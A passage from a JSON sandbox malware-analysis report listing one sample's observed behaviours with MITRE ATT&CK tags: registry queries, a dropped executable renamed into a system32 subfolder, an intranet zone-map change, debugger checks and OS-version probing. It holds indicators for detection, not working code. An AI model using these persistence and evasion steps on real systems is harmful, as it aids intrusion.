\"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe.Local\\\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\6E0FC8D7B0D1C1CC6F3642B5874EB2075B33061AB54CD83AB6AB3DA8B791EFFE.EXE.LOCAL\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\mdzgxwae.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SECURITY_HKLM_ONLY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"mdzgxwae.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\mdzgxwae.exe]- [targetUID: 00000000-00005184]\n \"MDZGXWAE.EXE.67B73C1B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"mdzgxwae.exe.67B73C1A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\mdzgxwae.exe\" to \"%WINDIR%\\system32\\cygqxrtx\\mdzgxwae.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00005856-00000105-318877 [PID: 5856]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005856-00000105-988368 [PID: 5856]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005856-00000105-1837882 [PID: 5856]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005856-00000105-3072448 [PID: 5856]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005856-00000105-4106050 [PID: 5856]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005856-00000105-4364781 [PID: 5856]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005856-00000105-5078289 [PID: 5856]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00005700-00000105-80036 [PID: 5700]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F480000\n \"mdzgxwae.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F480000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F480000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00005856-00000105-7770571", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" queries volume information of \"C:\\\" at 00000000-00005184-0000010C-1462348\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" queries volume information of \"C:\\\" at 00000000-00005184-0000010C-1463586\n \"mdzgxwae.exe\" queries volume information of \"C:\\\" at 00000000-00006096-0000010C-2342143\n \"mdzgxwae.exe\" queries volume information of \"C:\\\" at 00000000-00006096-0000010C-2346237\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005700-0000010C-46882\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005700-0000010C-484627\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005700-0000010C-1399728\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005700-0000010C-1401445", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c587743797275ffffffff0c0000004c6258771f797275ffffffff0c00000064ec120004000000000400000100000078ec12000a0e300000000000 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006b0600000088ea6676ecf91200b344516b88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b400005b12816bcf51200616b400088000000f822410081a86676ecf912000000900100bedc0000020000080000009c2b5f00 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb4b76981f260000c0fd7f9a5c5a7700e0fd7fb0c96c0144c0fd7f00000000400000003f0000002500000000c0fd7fa4c96c01c15c5a77608261772500000000c0fd7f9a5c5a7700e0fd7fc8c96c01578959778083617713177375d8eb4b76 (UID: 00000000-00005184)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000e8dc3e00bcfb6500145c5977435c597788fc65000100000094013c00010000003cfb6500935c5a7740836177d4a059772ec8267788fc65000100000001000000c8e33e00000000000cfb65003cfb6500a8fb650095e15577ea371a00feffffffd4a059771bbe727500006f7700000000 (UID: 00000000-00005780)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000040ad1600d0f93700145c5977435c59779cfa370001000000940114000100000050f93700935c5a7740836177d4a0597730c274779cfa37000100000001000000e8df16000000000020f9370050f93700bcf9370095e15577983f1a00feffffffd4a059771bbe727500006f7700000000 (UID: 00000000-00005912)\n \"mdzgxwae.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000038756400b8fc2400145c5977435c597784fd240001000000940162000100000038fc2400935c5a7740836177d4a059776fbd677784fd2400010000000100000080b064000000000008fc240038fc2400a4fc240095e15577af451a00feffffffd4a059771bbe727500006f7700000000 (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c587743797275ffffffff0c0000004c6258771f797275ffffffff0c00000064ec120004000000000400000100000078ec12000a0e150000000000 (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" queries volume information of \"C:\\\" at 00000000-00005184-0000010C-1462348\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" queries volume information of \"C:\\\" at 00000000-00005184-0000010C-1463586\n \"mdzgxwae.exe\" queries volume information of \"C:\\\" at 00000000-00006096-0000010C-2342143\n \"mdzgxwae.exe\" queries volume information of \"C:\\\" at 00000000-00006096-0000010C-2346237\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005700-0000010C-46882\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005700-0000010C-484627\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005700-0000010C-1399728\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005700-0000010C-1401445", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005412)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e6b00fce2120080f4fd7500006b000000000089f4fd752a2a2a160200000070e312006ce3120064e2120068e2120018e4120095e155778d1d1a00c0e21200c83a077634e31200d58cff7570e3120004e3120042a4fd75a802077644e31200d2f4fd75080000006ef5fd7544f5fd75922b2a160200000070aa486f0000130026bb486f18e31200020000000000130070aa486f48e3120042a4fd75a80207768ce3120010a9486f08000000e6a8486fa8a528150200000070aa486f0000130026bb486fac0e6b00780e6b0058e312008050546f18e41200f9f24c6fccee727a (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005184)\n 